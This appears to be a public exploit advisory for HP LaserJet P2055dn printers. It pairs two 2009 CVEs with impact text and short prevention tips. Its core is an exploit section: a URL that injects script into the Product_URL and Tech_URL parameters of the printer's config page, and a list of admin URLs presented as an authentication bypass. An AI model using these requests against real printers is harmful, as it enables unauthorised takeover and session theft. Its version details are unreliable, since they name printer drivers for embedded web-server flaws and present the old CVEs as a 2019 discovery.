HP LaserJet P2055dn Printers 6.7.0.x Auth Bypass XSS

1. ############################################################################################
2.  
3. # Exploit Title : HP LaserJet P2055dn Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/04/2019
7. # Vendor Homepage : hp.com
8. # Software Information Link :
9. support.hp.com/gb-en/drivers/selfservice/hp-laserjet-p2055-printer-series/3662052/model/3662058
10. # Software Version :
11. Driver-Universal Print Driver for Managed Services => 6.7.0.23989
12. Driver-Universal Print Driver => 6.1.0.20062 - 6.7.0.23989
13. Software Universal Printer Driver => 1.8.6
14. # Tested On : Windows and Linux
15. # Category : Hardware
16. # Exploit Risk : High / Medium
17. # Common Vulnerability Enumeration :
18. CVE-2009-0941
19. CVE-2009-2684
20. # Vulnerability Type :
21. CWE-306 [ Missing Authentication for Critical Function ]
22. CWE-592 [ Authentication Bypass ]
23. CWE-287 [ Improper Authentication ]
24. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
25. CWE-264 [ Permissions, Privileges, and Access Controls ]
26. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
27. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
28. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
29.  
30. ############################################################################################
31.  
32. # Description about Software :
33. ***************************
34. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
35.  
36. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
37.  
38. ############################################################################################
39.  
40. # Impact :
41. ***********
42. Authentication Bypass / Missing Authentication For Critical Function :
43. ************************************************************
44. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
45.  
46. Remote attackers can edit - delete and access files and administrative access without real administrator permission.
47.  
48. Remote attackers can bypass this because the system doesn't ask admin username and password.
49.  
50. The software does not perform any authentication for functionality that requires a provable user identity
51.  
52. or consumes a significant amount of resources.
53.  
54. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
55.  
56. affected application and change configuration settings or gain administrative access.
57.  
58. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
59.  
60. Developing a fix would require understanding of the current application security model and implemented access controls.
61.  
62. Three basic rules however can help you eliminate potential improper authorization issues:
63.  
64. 1) Identify all privileged assets within your application (web pages that display sensitive data,
65. website sections that contain privileged/administrative functionality, etc.)
66.  
67. 2) Identify user roles within the application and their access permissions
68.  
69. 3) Always check if the user should have privileges to access the asset.
70.  
71. XSS Cross Site Scripting Impact /Prevention :
72. ****************************************
73. HP LaserJet P2055dn printer are prone to a cross-site scripting vulnerability
74. because it fails to sufficiently sanitize user-supplied data.
75.  
76. A remote user can access the target user's cookies (including authentication cookies),
77. if any, associated with the HP Printer interface, access data recently submitted by the
78. target user via web form to the site, or take actions on the site acting as the target user.
79.  
80. Cross-site scripting vulnerability in HP Jetdirect and the Embedded Web Server (EWS)
81. on certain HP LaserJet and Color LaserJet printers allow remote attackers to
82. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an
83. Apply action to the support_param.html/config script.
84.  
85. Prevention of XSS Vulnerability :
86. ****************************
87. set the administrator password
88. use a new browser instance for administrator tasks
89. do not access other web sites while performing administrator tasks
90. exit the browser when administrator tasks are complete
91.  
92. According to the CVE-2009-0941 =>
93. *********************************
94. The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
95. has no management password by default, which makes it easier for remote attackers to obtain access.
96.  
97. According to the CVE-2009-2684 =>
98. *********************************
99. Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
100. certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
101. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
102. in an Apply action to the support_param.html/config script.
103.  
104. ############################################################################################
105.  
106. XSS Cross Site Scripting Exploit :
107. *******************************
108. https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
109.  
110. It returns as " /success_result.htm/config "
111.  
112. Configuration Successfully Done.
113.  
114. # Authentication Bypass Exploit / Vulnerability :
115. *******************************************
116. https://[targetipaddress]/hp/device/this.LCDispatcher
117.  
118. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
119.  
120. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
121.  
122. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
123.  
124. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
125.  
126. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
127.  
128. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
129.  
130. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
131.  
132. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
133.  
134. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
135.  
136. https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
137.  
138. https://[targetipaddress]/hp/device/info_configuration.htm
139.  
140. https://[targetipaddress]/hp/jetdirect
141.  
142. https://[targetipaddress]/config_pro.htm
143. https://[targetipaddress]/tcpipv6.htm
144. https://[targetipaddress]/tcpipv4.htm
145.  
146. https://[targetipaddress]/tcp_param.htm
147. https://[targetipaddress]/network_id.htm
148.  
149. https://[targetipaddress]/tcp_summary.htm
150. https://[targetipaddress]/index_info.htm
151.  
152. https://[targetipaddress]/support_param.html
153. https://[targetipaddress]/support.htm
154.  
155. https://[targetipaddress]/tcp_diag.htm
156. https://[targetipaddress]/configpage.htm
157.  
158. https://[targetipaddress]/tcp_param.htm
159. https://[targetipaddress]/network_id.htm
160.  
161. ############################################################################################
162.  
163. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
164.  
165. ############################################################################################